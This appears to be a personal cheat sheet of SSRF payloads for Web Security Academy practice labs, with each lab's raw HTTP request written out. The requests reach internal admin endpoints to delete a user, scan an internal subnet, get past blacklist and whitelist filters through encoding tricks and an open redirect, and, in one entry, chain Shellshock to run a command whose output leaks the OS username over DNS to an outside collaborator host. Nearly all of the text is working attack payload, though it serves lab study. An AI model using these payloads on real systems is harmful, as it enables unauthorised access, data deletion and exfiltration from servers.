![[Pasted image 20250427204008.png]] ##### Basic SSRF against local server – admin access and delete user ```http POST /product/stock HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded stockApi=http://localhost/admin/delete?username=carlos ``` Context: SSRF via stockApi parameter to internal admin endpoint Encoding: None Source: [[1. Basic SSRF against the local server]] --- ##### Basic SSRF against another back-end system – scan internal network and delete user ```http POST /product/stock HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded stockApi=http://192.168.0.X:8080/admin/delete?username=carlos ``` Context: SSRF via stockApi parameter scanning 192.168.0.X range on port 8080 Encoding: None Source: [[2. Basic SSRF against another back-end system]] --- ##### Blind SSRF with out-of-band detection – trigger request via Referer header ```http GET /product?productId=1 HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Referer: https://YOUR-COLLABORATOR-ID.burpcollaborator.net/ ``` Context: Blind SSRF via Referer header triggering out-of-band HTTP/DNS request Encoding: None Source: [[3. Blind SSRF with out-of-band detection]] --- ##### SSRF with blacklist-based input filter – bypass to access admin and delete user ```http POST /product/stock HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded stockApi=http://127.1/%2561dmin/delete?username=carlos ``` Context: SSRF via stockApi parameter bypassing blacklist with IP alias and double URL encoding Encoding: Double URL encoding (`a` → `%2561`) Source: [[4. SSRF with blacklist-based input filter]] ##### SSRF with filter bypass via open redirection vulnerability – access admin and delete user ```http POST /product/stock HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos ``` Context: SSRF via open redirect exploiting path parameter to bypass stockApi domain restriction Encoding: None Source: [[5. SSRF with filter bypass via open redirection vulnerability]] ---- ##### Blind SSRF with Shellshock Exploitation – OOB DNS exfiltration of OS user ```http GET /product?productId=1 HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net User-Agent: () { :; }; /usr/bin/nslookup $(whoami).v41dugnd8u9on3g7z1lihjz4dsrtx4.burpcollaborator.net Referer: http://192.168.0.1:8080 ``` Context: SSRF via the `Referer` header combined with Shellshock in `User-Agent` to trigger a DNS lookup back to Burp Collaborator and leak the internal OS username Encoding: None (payload delivered raw in headers) Source: [[6. Blind SSRF with Shellshock exploitation]] --- ##### Classic SSRF with whitelist-based input filter – bypass via double-encoded fragment in userinfo ```http GET /product/stock HTTP/2 Host: YOUR-LAB-ID.web-security-academy.net stockApi=http://localhost:80%[email protected]/admin/delete?username=carlos ``` Context: SSRF via the `stockApi` parameter protected by a whitelist on `stock.weliketoshop.net`, bypassed by injecting `localhost` in the userinfo section with a double-encoded `#` to split host and path. Encoding: Double URL encoding of `#` (`%2523` → `%23`) Source: [[7. SSRF with whitelist-based input filter]]